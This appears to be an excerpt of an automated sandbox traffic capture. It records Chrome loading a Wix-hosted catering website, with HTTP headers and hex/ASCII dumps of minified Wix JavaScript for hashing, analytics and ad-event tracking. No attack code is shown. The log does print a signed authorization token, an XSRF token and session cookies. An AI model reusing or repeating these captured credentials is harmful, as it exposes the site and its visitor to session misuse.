                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVcxMNgXS7J8yrt3GwAgEfDyVn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        x-cache: miss
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC226INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 36 35 35 5d 2c 7b 39 35 36 36 37 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 74 3d 28 29 3d 3e 28 28 29 3d 3e 7b 76 61 72 20 65 3d 7b 37 32 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3b 65 2e 65 78 70 6f 72 74 73 3d 28 72 3d 72 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 2c 74
                                                                                                                                                                                                                        Data Ascii: (self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[4655],{95667:function(e){var t;"undefined"!=typeof self&&self,t=()=>(()=>{var e={724:function(e,t,n){var r;e.exports=(r=r||function(e,t
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1390INData Raw: 29 7b 76 61 72 20 72 3b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 26 26 28 72 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2e 63 72 79 70 74 6f 26 26 28 72 3d 73 65 6c 66 2e 63 72 79 70 74 6f 29 2c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 26 26 28 72 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 29 2c 21 72 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 72 3d 77 69 6e
                                                                                                                                                                                                                        Data Ascii: ){var r;if("undefined"!=typeof window&&window.crypto&&(r=window.crypto),"undefined"!=typeof self&&self.crypto&&(r=self.crypto),"undefined"!=typeof globalThis&&globalThis.crypto&&(r=globalThis.crypto),!r&&"undefined"!=typeof window&&window.msCrypto&&(r=win
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1390INData Raw: 74 72 69 6e 67 69 66 79 28 74 68 69 73 29 7d 2c 63 6f 6e 63 61 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 6e 3d 65 2e 77 6f 72 64 73 2c 72 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 2c 6f 3d 65 2e 73 69 67 42 79 74 65 73 3b 69 66 28 74 68 69 73 2e 63 6c 61 6d 70 28 29 2c 72 25 34 29 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 6f 3b 69 2b 2b 29 7b 76 61 72 20 61 3d 6e 5b 69 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 69 25 34 2a 38 26 32 35 35 3b 74 5b 72 2b 69 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 28 72 2b 69 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 76 61 72 20 63 3d 30 3b 63 3c 6f 3b 63 2b 3d 34 29 74 5b 72 2b 63 3e 3e 3e 32 5d 3d 6e 5b 63 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65
                                                                                                                                                                                                                        Data Ascii: tringify(this)},concat:function(e){var t=this.words,n=e.words,r=this.sigBytes,o=e.sigBytes;if(this.clamp(),r%4)for(var i=0;i<o;i++){var a=n[i>>>2]>>>24-i%4*8&255;t[r+i>>>2]|=a<<24-(r+i)%4*8}else for(var c=0;c<o;c+=4)t[r+c>>>2]=n[c>>>2];return this.sigByte
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1390INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 64 61 74 61 3d 6e 65 77 20 75 2e 69 6e 69 74 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 3d 30 7d 2c 5f 61 70 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 65 3d 6d 2e 70 61 72 73 65 28 65 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 65 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 65 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 6f 3d 72 2e 77 6f 72 64 73 2c 69 3d 72 2e 73 69 67 42 79 74 65 73 2c 61 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 63 3d 69 2f 28 34 2a 61 29 2c 73 3d 28 63 3d 74
                                                                                                                                                                                                                        Data Ascii: function(){this._data=new u.init,this._nDataBytes=0},_append:function(e){"string"==typeof e&&(e=m.parse(e)),this._data.concat(e),this._nDataBytes+=e.sigBytes},_process:function(t){var n,r=this._data,o=r.words,i=r.sigBytes,a=this.blockSize,c=i/(4*a),s=(c=t
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1390INData Raw: 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 6f 2e 69 6e 69 74 28 63 2e 73 6c 69 63 65 28 30 29 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 74 68 69 73 2e 5f 68 61 73 68 2e 77 6f 72 64 73 2c 72 3d 6e 5b 30 5d 2c 6f 3d 6e 5b 31 5d 2c 69 3d 6e 5b 32 5d 2c 61 3d 6e 5b 33 5d 2c 63 3d 6e 5b 34 5d 2c 6c 3d 6e 5b 35 5d 2c 64 3d 6e 5b 36 5d 2c 70 3d 6e 5b 37 5d 2c 6d 3d 30 3b 6d 3c 36 34 3b 6d 2b 2b 29 7b 69 66 28 6d 3c 31 36 29 75 5b 6d 5d 3d 30 7c 65 5b 74 2b 6d 5d 3b 65 6c 73 65 7b 76 61 72 20 76 3d 75 5b 6d 2d 31 35 5d 2c 66 3d 28 76 3c 3c 32 35 7c 76 3e 3e 3e 37 29 5e 28 76 3c 3c 31 34 7c 76 3e 3e 3e 31 38
                                                                                                                                                                                                                        Data Ascii: d({_doReset:function(){this._hash=new o.init(c.slice(0))},_doProcessBlock:function(e,t){for(var n=this._hash.words,r=n[0],o=n[1],i=n[2],a=n[3],c=n[4],l=n[5],d=n[6],p=n[7],m=0;m<64;m++){if(m<16)u[m]=0|e[t+m];else{var v=u[m-15],f=(v<<25|v>>>7)^(v<<14|v>>>18
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1390INData Raw: 2c 74 7c 7c 22 64 65 66 61 75 6c 74 22 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 72 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 40 40 74 6f 50 72 69 6d 69 74 69 76 65 20 6d 75 73 74 20 72 65 74 75 72 6e 20 61 20 70 72 69 6d 69 74 69 76 65 20 76 61 6c 75 65 2e 22 29 7d 72 65 74 75 72 6e 28 22 73 74 72 69 6e 67 22 3d 3d 3d 74 3f 53 74 72 69 6e 67 3a 4e 75 6d 62 65 72 29 28 65 29 7d 2c 65 2e 65 78 70 6f 72 74 73 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3d 21 30 2c 65 2e 65 78 70 6f 72 74 73 2e 64 65 66 61 75 6c 74 3d 65 2e 65 78 70 6f 72 74 73 7d 2c 31 37 34 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 76 61 72 20 72 3d 6e 28 31 31 34 29 2e 64 65 66 61 75 6c 74 2c 6f 3d 6e 28 36 36 32 29 3b 65 2e 65 78 70 6f 72 74 73
                                                                                                                                                                                                                        Data Ascii: ,t||"default");if("object"!=r(o))return o;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===t?String:Number)(e)},e.exports.__esModule=!0,e.exports.default=e.exports},174:(e,t,n)=>{var r=n(114).default,o=n(662);e.exports
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1390INData Raw: 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 7d 3b 76 61 72 20 72 3d 7b 7d 3b 72 65 74 75 72 6e 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 72 29 2c 6e 2e 64 28 72 2c 7b 61 70 69 3a 28 29 3d 3e 65 2c 63 68 61 6e 6e 65 6c 4e 61 6d 65 73 3a 28 29 3d 3e 66 65 2c 6c 69 73 74 65 6e 65 72 73 3a 28 29 3d 3e 68 65 7d 29 3b 76 61 72 20 65 3d 7b 7d 3b 6e 2e 72 28 65 29 2c 6e 2e 64 28 65 2c 7b 61 64 64 4c 69 73 74 65 6e 65 72 3a 28 29 3d 3e 49 65 2c 69 6e 69 74 3a 28 29 3d 3e 43 65 2c 74 72 61 63 6b 45 76 65 6e 74 3a 28 29 3d 3e 62 65 2c 74 72 61 63 6b 45 76 65 6e 74 54 6f 43 68 61 6e 6e 65 6c 73 4f 6e 6c 79 3a 28 29 3d 3e 41 65 2c 74 72 61 63 6b 45 76 65 6e 74 54 6f
                                                                                                                                                                                                                        Data Ascii: efineProperty(e,"__esModule",{value:!0})};var r={};return(()=>{"use strict";n.r(r),n.d(r,{api:()=>e,channelNames:()=>fe,listeners:()=>he});var e={};n.r(e),n.d(e,{addListener:()=>Ie,init:()=>Ce,trackEvent:()=>be,trackEventToChannelsOnly:()=>Ae,trackEventTo
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1390INData Raw: 33 26 72 5b 38 5d 7c 31 32 38 2c 74 29 7b 6e 3d 6e 7c 7c 30 3b 66 6f 72 28 76 61 72 20 6f 3d 30 3b 6f 3c 31 36 3b 2b 2b 6f 29 74 5b 6e 2b 6f 5d 3d 72 5b 6f 5d 3b 72 65 74 75 72 6e 20 74 7d 72 65 74 75 72 6e 20 64 28 72 29 7d 2c 6d 3d 28 65 2c 74 2c 6e 2c 72 29 3d 3e 7b 63 6f 6e 73 74 20 6f 3d 7b 2e 2e 2e 6e 2c 5f 69 6e 74 65 72 6e 61 6c 45 76 65 6e 74 49 64 3a 70 28 29 7d 3b 65 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 76 6f 69 64 20 30 3d 3d 3d 6e 26 26 28 6e 3d 7b 7d 29 3b 63 6f 6e 73 74 7b 61 70 70 44 65 66 49 64 3a 6f 2c 2e 2e 2e 69 7d 3d 6e 3b 72 65 74 75 72 6e 20 74 2e 65 76 65 6e 74 73 3f 28 28 72 3d 72 7c 7c 7b 7d 29 2e 63 6f 6e 66 69 67 3d 74 2e 63 6f 6e 66 69 67 2c 72 2e 63 6f 6e 74 65 78
                                                                                                                                                                                                                        Data Ascii: 3&r[8]|128,t){n=n||0;for(var o=0;o<16;++o)t[n+o]=r[o];return t}return d(r)},m=(e,t,n,r)=>{const o={...n,_internalEventId:p()};e.forEach((e=>{(function(e,t,n,r){void 0===n&&(n={});const{appDefId:o,...i}=n;return t.events?((r=r||{}).config=t.config,r.contex
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1390INData Raw: 5c 73 2f 67 2c 22 22 29 29 2c 63 3d 7b 5b 6e 2e 66 69 72 73 74 5f 6e 61 6d 65 5d 3a 65 3d 3e 69 28 65 29 2c 5b 6e 2e 6c 61 73 74 5f 6e 61 6d 65 5d 3a 65 3d 3e 69 28 65 29 2c 5b 6e 2e 65 6d 61 69 6c 5d 3a 65 3d 3e 65 2e 74 72 69 6d 28 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 5b 6e 2e 70 68 6f 6e 65 5d 3a 65 3d 3e 28 65 3d 3e 65 2e 74 72 69 6d 28 29 2e 72 65 70 6c 61 63 65 28 2f 5c 44 2f 67 2c 22 22 29 2e 72 65 70 6c 61 63 65 28 2f 5e 30 2b 2f 2c 22 22 29 29 28 65 29 2c 5b 72 2e 63 69 74 79 5d 3a 65 3d 3e 61 28 65 29 2c 5b 72 2e 73 75 62 64 69 76 69 73 69 6f 6e 5d 3a 65 3d 3e 61 28 65 29 2c 5b 72 2e 63 6f 75 6e 74 72 79 5d 3a 65 3d 3e 61 28 65 29 2c 5b 72 2e 70 6f 73 74 61 6c 43 6f 64 65 5d 3a 65 3d 3e 61 28 65 29 7d 2c 73 3d 65 2e 75 73 65 72 44 61
                                                                                                                                                                                                                        Data Ascii: \s/g,"")),c={[n.first_name]:e=>i(e),[n.last_name]:e=>i(e),[n.email]:e=>e.trim().toLowerCase(),[n.phone]:e=>(e=>e.trim().replace(/\D/g,"").replace(/^0+/,""))(e),[r.city]:e=>a(e),[r.subdivision]:e=>a(e),[r.country]:e=>a(e),[r.postalCode]:e=>a(e)},s=e.userDa
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1390INData Raw: 2e 49 28 6e 29 2c 63 6f 6e 74 65 6e 74 5f 69 64 73 3a 5b 74 5d 2c 63 6f 6e 74 65 6e 74 5f 74 79 70 65 3a 22 70 72 6f 64 75 63 74 22 7d 2c 7b 65 76 65 6e 74 49 44 3a 6e 2e 5f 69 6e 74 65 72 6e 61 6c 45 76 65 6e 74 49 64 7d 5d 5d 7d 2c 49 6e 69 74 69 61 74 65 43 68 65 63 6b 6f 75 74 3a 65 3d 3e 5b 5b 22 74 72 61 63 6b 22 2c 22 49 6e 69 74 69 61 74 65 43 68 65 63 6b 6f 75 74 22 2c 7b 2e 2e 2e 49 28 62 28 65 29 29 2c 2e 2e 2e 65 2e 63 6f 6e 74 65 6e 74 73 26 26 7b 63 6f 6e 74 65 6e 74 5f 69 64 73 3a 65 2e 63 6f 6e 74 65 6e 74 73 2e 6d 61 70 28 28 65 3d 3e 65 2e 69 64 29 29 2c 63 6f 6e 74 65 6e 74 5f 74 79 70 65 3a 22 70 72 6f 64 75 63 74 22 7d 7d 2c 7b 65 76 65 6e 74 49 44 3a 65 2e 5f 69 6e 74 65 72 6e 61 6c 45 76 65 6e 74 49 64 7d 5d 5d 2c 41 64 64 50 61 79
                                                                                                                                                                                                                        Data Ascii: .I(n),content_ids:[t],content_type:"product"},{eventID:n._internalEventId}]]},InitiateCheckout:e=>[["track","InitiateCheckout",{...I(b(e)),...e.contents&&{content_ids:e.contents.map((e=>e.id)),content_type:"product"}},{eventID:e._internalEventId}]],AddPay


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        79192.168.2.55000034.149.87.454435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC1599OUTGET /_api/tag-manager/api/v1/tags/sites/8fc1138c-79b4-4e29-bbc0-d551c6ca71af?wixSite=false&htmlsiteId=cd5327d5-636b-4778-a97d-3945688a9fde&language=en&partytown=false HTTP/1.1
                                                                                                                                                                                                                        Host: www.samantacatering.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        content-type: application/json
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        authorization: OxVYVtTcQVXwic_KmDl3WBmSw8wQBIO6sL0F4R31CWY.eyJpbnN0YW5jZUlkIjoiOGZjMTEzOGMtNzliNC00ZTI5LWJiYzAtZDU1MWM2Y2E3MWFmIiwiYXBwRGVmSWQiOiIyMmJlZjM0NS0zYzViLTRjMTgtYjc4Mi03NGQ0MDg1MTEyZmYiLCJtZXRhU2l0ZUlkIjoiOGZjMTEzOGMtNzliNC00ZTI5LWJiYzAtZDU1MWM2Y2E3MWFmIiwic2lnbkRhdGUiOiIyMDI1LTAxLTEwVDEzOjUyOjM2LjM3MFoiLCJkZW1vTW9kZSI6ZmFsc2UsImFpZCI6IjhkNjQ5MzM3LTg5Y2QtNDhkNC05OTM5LTE3ZDFlMDgyOTg4NCIsInNpdGVPd25lcklkIjoiMDE1OGI0YzYtM2I1Ny00NmI3LWFlZmYtN2JlMzM2NTIyN2Q5In0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Cookie: XSRF-TOKEN=1736517156|zNWYyaBL2sXn; hs=441353572; svSession=2a930e69c94ce92e7473fb7588b1b8619ec94ae447207b1a769369bd5d3b0b43431f61ddbd00e3be42d66bae2b8a582e1e60994d53964e647acf431e4f798bcd4304a4d4d509042ad582d375075a884390396b31efeb64a472005d70c04e92b55797c1d6d99734f7952db21e644cd88b62a7ec3fed30c8eea5c1a3a42c574873a0b62283d958be7e075929b5797ae2c5; bSession=153dfd08-7420-4371-86fb-5d02f7e531d5|1
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1345INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 788
                                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                        ETag: W/"314-lOypOccj/vT2TfcOcuOl4nWpBnY"
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                                        X-Wix-Request-Id: 1736517186.979109326140311192005
                                                                                                                                                                                                                        Server: Pepyaka
                                                                                                                                                                                                                        X-Wix-Request-Id: 1736517186.979109326140311192005
                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:53:07 GMT
                                                                                                                                                                                                                        X-Served-By: cache-iad-kcgs7200045-IAD
                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=86401
                                                                                                                                                                                                                        X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLs9O2rtUVmKdPF2STo75RYMtFZnRrnvyqOEKpetNb+u3,F/2b1J1kmHV2BLnAgEYozKj90fULc7CK2OPUIN1iVrgj6r0AZAMucqm4C7kwBEyaSEuevgtwAIXARJaY53fTiw==,/B3VgDtICCNDWQOEWfZmMs0NC14VuEB4xovR26CjS6A=,MDFDoTqjWxpWhAuWfTm+PMlWHhcMixL/A8DJQOq6McHxR+AhzulawUlpnPLs+eyMlKl4TRaWtfNmgDvy268z3FiB5QmpRe2J37zq9nDD6cs=,/B3VgDtICCNDWQOEWfZmMsPkR7Y/cGvumVgyvizTYsk=,mvxQ9qSAmY38asKjFCcmG+2YyfvPy8GEG+3+SMl7u7g4iY9+3hB+MrNBcsbSev+VWlHEEdsXbMAN79445aZs76+dJD48Zxl33X4q5tW84po=,/B3VgDtICCNDWQOEWfZmMtDtIx6jpHqqdeOgkYBY/3Q=,tznMqpp3e1oucszW+OT1FCyIGdvvM+Gvk6kv3gMXCU6pWqmfNlOfAW89XVvIfva2HGND8LdL3FNaixDMt9BYgY5IHVWuZ9iUVcnnVtSQNHI=
                                                                                                                                                                                                                        Via: 1.1 google
                                                                                                                                                                                                                        glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC45INData Raw: 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 65 72 72 6f 72 73 22 3a 5b 5d 2c 22 63 6f 6e 66 69 67 22 3a 7b 22 63 6f 6e 73 65 6e 74 50 6f 6c 69
                                                                                                                                                                                                                        Data Ascii: {"tags":[],"errors":[],"config":{"consentPoli
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC743INData Raw: 63 79 22 3a 6e 75 6c 6c 2c 22 67 65 6f 22 3a 22 55 53 22 2c 22 65 78 70 65 72 69 6d 65 6e 74 73 22 3a 7b 22 73 70 65 63 73 2e 63 6f 6f 6b 69 65 43 6f 6e 73 65 6e 74 2e 50 6f 6c 69 63 79 42 79 47 6c 6f 62 61 6c 50 72 69 76 61 63 79 43 6f 6e 74 72 6f 6c 22 3a 22 74 72 75 65 22 2c 22 73 70 65 63 73 2e 74 61 67 4d 61 6e 61 67 65 72 43 6f 6e 66 69 67 4f 76 65 72 72 69 64 65 73 22 3a 22 74 72 75 65 22 2c 22 73 70 65 63 73 2e 74 61 67 4d 61 6e 61 67 65 72 52 65 6e 64 65 72 54 61 67 42 79 50 61 67 65 49 44 22 3a 22 74 72 75 65 22 2c 22 73 70 65 63 73 2e 74 61 67 4d 61 6e 61 67 65 72 2e 52 65 61 64 4c 6f 61 64 4f 6e 63 65 46 72 6f 6d 54 61 67 22 3a 22 74 72 75 65 22 2c 22 73 70 65 63 73 2e 69 67 6e 6f 72 65 44 69 73 61 62 6c 65 64 41 70 70 4d 61 72 6b 65 74 54 65
                                                                                                                                                                                                                        Data Ascii: cy":null,"geo":"US","experiments":{"specs.cookieConsent.PolicyByGlobalPrivacyControl":"true","specs.tagManagerConfigOverrides":"true","specs.tagManagerRenderTagByPageID":"true","specs.tagManager.ReadLoadOnceFromTag":"true","specs.ignoreDisabledAppMarketTe


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        80192.168.2.54999934.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC626OUTGET /services/wix-thunderbolt/dist/group_0.774938b3.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1162INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 1145
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: G7f99uHE6zqtR2frvfyhY1F8g28ffUtT
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 654759403 637344453
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 430223730
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVcydaHuKmePuYLvGovietlnc/MRAhrlVRxaXdYSRy7tLb
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Tue, 07 Jan 2025 09:54:00 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 273546
                                                                                                                                                                                                                        Last-Modified: Tue, 07 Jan 2025 09:48:57 GMT
                                                                                                                                                                                                                        ETag: "297cd10b2ce6e15bd86473ec1ca874b7"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC228INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 34 35 37 5d 2c 7b 31 35 34 32 38 3a 28 65 2c 74 2c 61 29 3d 3e 7b 61 2e 72 28 74 29 2c 61 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 28 29 3d 3e 64 7d 29 3b 76 61 72 20 6e 3d 61 28 34 31 35 39 34 29 2c 73 3d 61 2e 6e 28 6e 29 3b 63 6f 6e 73 74 20 64 3d 28 7b 69 64 3a 65 7d 29 3d 3e 73 28 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 2c 7b 69 64 3a 65
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[7457],{15428:(e,t,a)=>{a.r(t),a.d(t,{default:()=>d});var n=a(41594),s=a.n(n);const d=({id:e})=>s().createElement("div",{id:e
